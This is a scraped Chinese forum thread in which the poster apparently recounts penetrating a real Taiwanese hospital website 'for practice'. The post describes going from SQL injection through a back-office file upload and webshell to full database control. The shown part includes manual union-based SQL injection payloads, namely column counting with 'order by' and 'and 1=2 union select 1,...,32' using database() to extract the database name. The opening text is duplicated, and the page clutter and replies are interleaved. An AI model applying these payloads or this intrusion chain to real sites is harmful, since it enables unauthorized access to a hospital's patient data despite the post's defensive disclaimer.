【技术分享】对台湾医院一次从头日到尾的渗透过程
哈喽,你们好,又是我,千某人
最近找了一家台湾网站练练手,我发帖都是从信息防御角度出发的,请勿用于违法犯罪等途径。
本帖主要讲通过SQL注入经过后台上传文件通过hackbar post方式getshell直接拿下数据库权限的过程☘️
首先没有SQL注入就没有后面的一切,漏洞排行榜上,SQL注入基本都排榜首,接下来我将给你展示怎么从SQL注入到拿下数据库的一次过程
纯手工渗透测试
纯手工渗透测试
纯手工渗透测试
这里建议:工具永远不能代替手工。希望有些走这方面的路的人不要依赖工具,免得背上脚本小子的代号。懂了原理你就会发现用工具是多么low
最近找了一家台湾网站练练手,我发帖都是从信息防御角度出发的,请勿用于违法犯罪等途径。
本帖主要讲通过SQL注入经过后台上传文件通过hackbar post方式getshell直接拿下数据库权限的过程☘️
首先没有SQL注入就没有后面的一切,漏洞排行榜上,SQL注入基本都排榜首,接下来我将给你展示怎么从SQL注入到拿下数据库的一次过程
纯手工渗透测试
纯手工渗透测试
纯手工渗透测试
这里建议:工具永远不能代替手工。希望有些走这方面的路的人不要依赖工具,免得背上脚本小子的代号。懂了原理你就会发现用工具是多么low
21条回复 |
最后回复于2020-2-22
熟悉的数据库交互界面
回复列表
-
内容加载中...
说点什么...
回复列表
-
内容加载中...
说点什么...
这帖子比较硬核
回复列表
-
内容加载中...
说点什么...
通过order by判断改界面存在32个字段,
回复列表
-
内容加载中...
说点什么...
记得我不
回复列表
-
内容加载中...
说点什么...
有点映像。
回复列表
-
内容加载中...
说点什么...
构建联合查询 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,可以看到输出了以下字段
回复列表
-
内容加载中...
说点什么...
路过看看
回复列表
-
内容加载中...
说点什么...
再次构建语法
and 1=2 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,可以看到2这个字段输出了当前库名
and 1=2 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,可以看到2这个字段输出了当前库名
回复列表
-
内容加载中...
说点什么...
三连走起。
回复列表
-
内容加载中...
说点什么...
返回首页
编程源码
